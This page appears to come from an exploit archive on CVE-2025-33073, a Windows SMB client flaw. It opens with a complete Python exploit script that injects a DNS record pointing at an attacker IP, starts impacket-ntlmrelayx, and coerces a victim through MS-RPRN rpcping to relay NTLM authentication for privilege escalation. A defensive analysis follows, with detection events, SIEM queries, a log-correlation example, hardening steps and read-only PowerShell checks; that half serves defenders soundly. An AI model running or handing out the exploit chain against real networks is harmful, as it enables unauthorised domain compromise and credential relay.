Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)

Exploit Author: Mohammed Idrees Banyamer
Analysis Author: www.bubbleslearn.ir
Category: Remote
Language: Python
Published Date: 2025-06-15
#!/usr/bin/env python3
# Exploit Title:  Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)
# Author: Mohammed Idrees Banyamer
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Date: 2025-06-13
# Tested on: Windows 11 version 22H2, Windows Server 2022, Kali Linux 2024.2
# CVE: CVE-2025-33073
# Type: Remote
# Platform: Microsoft Windows (including Windows 10, Windows 11, Windows Server 2019/2022/2025)
# Attack Vector: Remote via DNS injection and RPC coercion with NTLM relay
# User Interaction: Required (authenticated domain user)
# Remediation Level: Official Fix Available
#
# Affected Versions:
# - Windows 11 versions 22H2, 22H3, 23H2, 24H2 (10.0.22621.x and 10.0.26100.x)
# - Windows Server 2022 (including 23H2 editions)
# - Windows Server 2019
# - Windows 10 versions from 1507 up to 22H2
# - Windows Server 2016 and 2008 (with appropriate versions)
#
# Description:
# This PoC demonstrates a complex attack chain exploiting improper access control in Windows SMB clients,
# leading to elevation of privilege through DNS record injection, NTLM relay attacks using impacket-ntlmrelayx,
# and coercion of a victim system (including Windows 11) to authenticate to an attacker-controlled server
# via MS-RPRN RPC calls. The exploit affects multiple Windows versions including Windows 11 (10.0.22621.x),
# Windows Server 2022, and earlier versions vulnerable to this method.
#
# Note: The exploit requires the victim to be an authenticated domain user and the environment
# must not have mitigations like SMB signing enforced or Extended Protection for Authentication (EPA).
#
# DISCLAIMER: For authorized security testing and educational use only.

import argparse
import subprocess
import socket
import time
import sys

def inject_dns_record(dns_ip, dc_fqdn, record_name, attacker_ip):
    print("[*] Injecting DNS record via samba-tool (requires admin privileges)...")
    cmd = [
        "samba-tool", "dns", "add", dns_ip, dc_fqdn,
        record_name, "A", attacker_ip, "--username=Administrator", "--password=YourPassword"
    ]
    try:
        subprocess.run(cmd, check=True)
        print("[+] DNS record successfully added.")
    except subprocess.CalledProcessError:
        print("[!] Failed to add DNS record. Check credentials and connectivity.")
        sys.exit(1)

def check_record(record_name):
    print("[*] Verifying DNS record propagation...")
    for i in range(10):
        try:
            result = socket.gethostbyname_ex(record_name)
            if result and result[2]:
                print(f"[+] DNS record resolved to: {result[2]}")
                return True
        except socket.gaierror:
            time.sleep(2)
    print("[!] DNS record did not propagate or resolve.")
    return False

def start_ntlmrelay(target):
    print("[*] Starting NTLM relay server (impacket-ntlmrelayx)...")
    try:
        subprocess.Popen([
            "impacket-ntlmrelayx", "-t", target, "--no-smb-server"
        ])
        print("[*] NTLM relay server started.")
    except Exception as e:
        print(f"[!] Failed to start NTLM relay server: {e}")
        sys.exit(1)

def trigger_coercion(victim_ip, fake_host):
    print("[*] Triggering victim to authenticate via MS-RPRN RPC coercion...")
    cmd = [
        "rpcping",
        "-t", f"ncacn_np:{victim_ip}[\\pipe\\spoolss]",
        "-s", fake_host,
        "-e", "1234",
        "-a", "n",
        "-u", "none",
        "-p", "none"
    ]
    try:
        subprocess.run(cmd, check=True)
        print("[+] Coercion RPC call sent successfully.")
    except subprocess.CalledProcessError:
        print("[!] RPC coercion failed. Verify victim connectivity and service status.")
        sys.exit(1)

def main():
    parser = argparse.ArgumentParser(description="Windows 11 SMB Client Elevation of Privilege PoC using DNS Injection + NTLM Relay + RPC Coercion")
    parser.add_argument("--attacker-ip", required=True, help="IP address of the attacker-controlled server")
    parser.add_argument("--dns-ip", required=True, help="IP address of the DNS server (usually the DC)")
    parser.add_argument("--dc-fqdn", required=True, help="Fully qualified domain name of the domain controller")
    parser.add_argument("--target", required=True, help="Target system to relay authentication to")
    parser.add_argument("--victim-ip", required=True, help="IP address of the victim system to coerce authentication from")
    args = parser.parse_args()

    record = "relaytrigger"
    fqdn = f"{record}.{args.dc_fqdn}"

    inject_dns_record(args.dns_ip, args.dc_fqdn, record, args.attacker_ip)
    if not check_record(fqdn):
        print("[!] DNS verification failed, aborting.")
        sys.exit(1)

    start_ntlmrelay(args.target)
    time.sleep(5)  # Wait for relay server to be ready

    trigger_coercion(args.victim_ip, fqdn)

    print("[*] Exploit chain triggered. Monitor ntlmrelayx output for authentication relays.")

if __name__ == "__main__":
    main()


Windows 11 SMB Client — CVE-2025-33073: High-level Analysis, Detection, and Mitigation

This article provides a defensive, high-level examination of the Windows SMB client vulnerability tracked as CVE-2025-33073 (public disclosure June 2025). It explains the impact and attack surface in non-actionable terms, and gives practical guidance for defenders: how to detect suspicious activity, harden environments, validate remediation, and prioritize mitigations.

Summary and Risk Profile

CVE-2025-33073 affects SMB client implementations in multiple Microsoft Windows releases (including Windows 11, Windows 10 variants, and Windows Server releases). At a high level, the vulnerability stems from an access-control weakness in how the SMB client's name-resolution, authentication, and RPC-coercion paths interact: an attacker can coerce an authenticated domain user or endpoint into authenticating to an attacker-controlled service, then abuse that authentication material via NTLM relay-style techniques to escalate privileges or, in some scenarios, achieve remote code execution.

  • Attack vector: Remote, requires an authenticated domain user (user interaction/context).
  • Typical chain: DNS or name-resolution manipulation + coerced authentication to an attacker-controlled endpoint + relay/abuse of the authentication material.
  • Impact: Privilege escalation, unauthorized access, and potential remote code execution in environments lacking mitigations.
  • Remediation level: Patch available from Microsoft. Configuration hardening strongly recommended.

Affected Versions (Representative)

Product Family   | Representative Versions
-----------------|-----------------------------------
Windows 11       | 22H2, 22H3, 23H2, 24H2
Windows 10       | 1507 through 22H2 (various builds)
Windows Server   | 2016, 2019, 2022 (including 23H2)

How the Attack Works — High-Level (Non-Actionable)

At a conceptual level, an attack leveraging this class of vulnerability typically combines:

  • Manipulation of name resolution or DNS records to make clients resolve attacker-controlled hosts.
  • Coercion techniques that induce the victim endpoint to initiate authentication to the attacker-controlled host (often by invoking services that perform network authentication implicitly).
  • Abuse of NTLM or negotiated authentication material using relay techniques to authenticate to higher-privileged targets on behalf of the victim.

Note: This description deliberately omits step-by-step procedures or tooling references — defenders should avoid replicating exploit chains outside of properly authorized lab tests.

Detection & Monitoring Guidance

Detecting exploitation attempts requires correlating authentication events, SMB/RPC access patterns, and DNS or name-resolution anomalies. Key disciplines include endpoint/host logging, domain controller logs, DNS server auditing, and network traffic inspection.

  • Events to monitor on endpoints and DCs:
    • Security events for authentication: 4624 (successful logon), 4625 (failed logon), 4648 (explicit credential use), 4776 (NTLM validation), and 4672/4673 (privileged operations).
    • SMB audit logs and application/service-specific errors referencing authentication failures or anomalous sessions.
  • DNS and name-resolution telemetry: unusual dynamic updates, unexpected A/AAAA records, or DNS updates originating from non-authoritative sources.
  • Network indicators: unexpected outbound SMB (port 445) or named-pipe/RPC traffic from workstations to external IPs or to internal hosts that typically do not receive client authentication.

Example SIEM/Search Queries (Defensive)


# Splunk-style example (generic)
index=wineventlog EventCode=4624 Authentication_Package=NTLM
| stats count by src_ip, Account_Name, Workstation_Name, Logon_Type
| where count > 5

This example groups successful NTLM authentications by source IP and account and highlights higher-than-normal counts that may indicate relay or coerced authentication activity.


# Elasticsearch/Kibana-style (pseudocode)
event.code:4624 AND process.name:svchost.exe AND authentication_package:NTLM
| group by src.ip, user.name
| filter by anomalous_target_hosts

Customize thresholds and anomaly detection based on baseline behavior per environment.
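The aggregation the Splunk search above performs, carried out in Python over a handful of constructed 4624/4625 records so it can be run offline; this is an added example and not part of the original analysis. It also adds one heuristic the page's query does not include: a workstation name that shows up from more than one source IP, which is what a relayed NTLM session tends to look like in the Security log. Event shapes, host names and addresses are all made up for the illustration.

```python
from collections import Counter, defaultdict
from dataclasses import dataclass

@dataclass(frozen=True)
class LogonEvent:
    """Fields of a Security 4624/4625 record that the search above uses."""
    event_code: int
    auth_package: str
    src_ip: str
    account: str
    workstation: str
    logon_type: int

# Constructed sample telemetry (not real events). WS-ALPHA normally logs on
# from 10.0.0.25; a burst of NTLM network logons carrying the same workstation
# name then arrives from 10.0.0.99, the trace a relayed session leaves behind.
SAMPLE_EVENTS = (
    [LogonEvent(4624, "NTLM", "10.0.0.25", "jdoe", "WS-ALPHA", 3)]
    + [LogonEvent(4624, "NTLM", "10.0.0.99", "jdoe", "WS-ALPHA", 3)] * 7
    + [LogonEvent(4624, "Kerberos", "10.0.0.40", "asmith", "WS-BETA", 3),
       LogonEvent(4624, "NTLM", "10.0.0.41", "svc-backup", "WS-GAMMA", 3),
       LogonEvent(4625, "NTLM", "10.0.0.99", "jdoe", "WS-ALPHA", 3)]
)

def successful_ntlm(events):
    """Filter equivalent to 'EventCode=4624 Authentication_Package=NTLM'."""
    return [e for e in events if e.event_code == 4624 and e.auth_package.upper() == "NTLM"]

def ntlm_logon_counts(events):
    """'stats count by src_ip, Account_Name, Workstation_Name, Logon_Type'."""
    return Counter((e.src_ip, e.account, e.workstation, e.logon_type)
                   for e in successful_ntlm(events))

def flag_bursts(events, threshold=5):
    """'where count > 5': groups with more successful NTLM logons than expected."""
    return {key: n for key, n in ntlm_logon_counts(events).items() if n > threshold}

def workstation_ip_mismatch(events):
    """Workstation names seen from more than one source IP. A relay forwards the
    victim's workstation name while the Source Network Address is the relay host,
    so one name spread across several IPs is worth a look (not in the page's query)."""
    seen = defaultdict(set)
    for e in successful_ntlm(events):
        seen[e.workstation].add(e.src_ip)
    return {ws: sorted(ips) for ws, ips in seen.items() if len(ips) > 1}

if __name__ == "__main__":
    print(flag_bursts(SAMPLE_EVENTS), workstation_ip_mismatch(SAMPLE_EVENTS))
```

Tune the threshold to the environment's baseline and exclude known multi-homed hosts (e.g. VPN concentrators) from the mismatch check before alerting on it.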

Immediate Mitigations & Hardening (Priority Checklist)

  • Apply vendor patches immediately: Install Microsoft updates that patch CVE-2025-33073 across affected OS versions. Test and roll out through standard patch management.
  • Enforce SMB signing and SMB encryption: Enable and require SMB signing and, where feasible, SMB encryption for both client and server roles via Group Policy or configuration baselines.
  • Enable Extended Protection for Authentication (EPA): Use EPA where supported to bind authentication to the intended service endpoint and reduce coercion risk.
  • Limit or block NTLM: Move away from NTLM where possible; progressively restrict NTLM usage via Group Policy (restricting NTLM authentication and auditing before enforcement).
  • Network controls: Block outbound SMB (TCP 445) from end-user subnets to untrusted networks; restrict SMB within network zones using segmentation and firewall policies.
  • DNS hygiene: Restrict dynamic DNS updates to authorized hosts, monitor for unusual updates, and harden DNS server access permissions.
  • Least privilege and privileged access workstations: Ensure high-value accounts do not log on to general-purpose workstations; use dedicated hardened jump hosts or PAWs for administration.
  • Multi-factor Authentication: Require MFA for remote and privileged access to reduce abuse potential of relayed credentials.

Validating Mitigations — Safe, Non-Exploit Tests

After applying patches and configuration changes, validate using non-exploit checks and telemetry:

  • Verify SMB signing/encryption via administrative PowerShell (see examples below).
  • Confirm NTLM restrictions and audit events are being generated (test on controlled accounts and machines only).
  • Run network scans that verify port and firewall restrictions (e.g., ensure endpoint-to-external SMB is blocked).

Defensive PowerShell Examples


# Query local SMB client and server configuration
Get-SmbClientConfiguration | Select-Object RequireSecuritySignature, EnableSecuritySignature
Get-SmbServerConfiguration | Select-Object RequireSecuritySignature, EnableSecuritySignature, EncryptData

Explanation: These PowerShell cmdlets query SMB client and server settings on a host. RequireSecuritySignature and EnableSecuritySignature indicate whether SMB signing is required or enabled; EncryptData shows whether SMB encryption is configured on the server side. Use these checks for policy compliance verification across endpoints and servers.


# Check LSA NTLM level (read-only, safe)
Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name LmCompatibilityLevel -ErrorAction SilentlyContinue

Explanation: LmCompatibilityLevel is a registry setting that influences NTLM/LM behavior. Querying it is a safe read-only operation that helps you inventory client/server authentication posture prior to making policy changes.

Operational Recommendations for SOCs and IT Teams

  • Prioritize patching for domain controllers and client endpoints at risk, and verify patch deployment with configuration management tools.
  • Perform focused hunts for anomalous NTLM authentication flows and DNS updates in the days following disclosure.
  • Communicate with application owners to identify legacy systems that depend on NTLM and plan migration strategies.
  • Use a test/lab environment to validate mitigations before wide deployment; avoid reproducing the exploit chain in production or without authorization.

Vendor Guidance & Patch Notes

Follow Microsoft's official security advisory and cumulative updates for specific KBs and guidance. Vendor advisories will include exact KB numbers, affected builds, and deployment recommendations; use those as the authoritative source for patching and rollback procedures.

Conclusion

CVE-2025-33073 highlights the ongoing risk from combined weaknesses across name resolution, authentication protocols, and legacy authentication mechanisms. Defenders should treat this incident as a reminder to accelerate migration away from NTLM, enforce SMB signing and EPA, apply vendor patches promptly, and increase visibility across DNS and authentication telemetry. Where uncertainty exists, coordinate remediation work through standard change management and testing processes and involve incident response or red-team resources only under authorized conditions.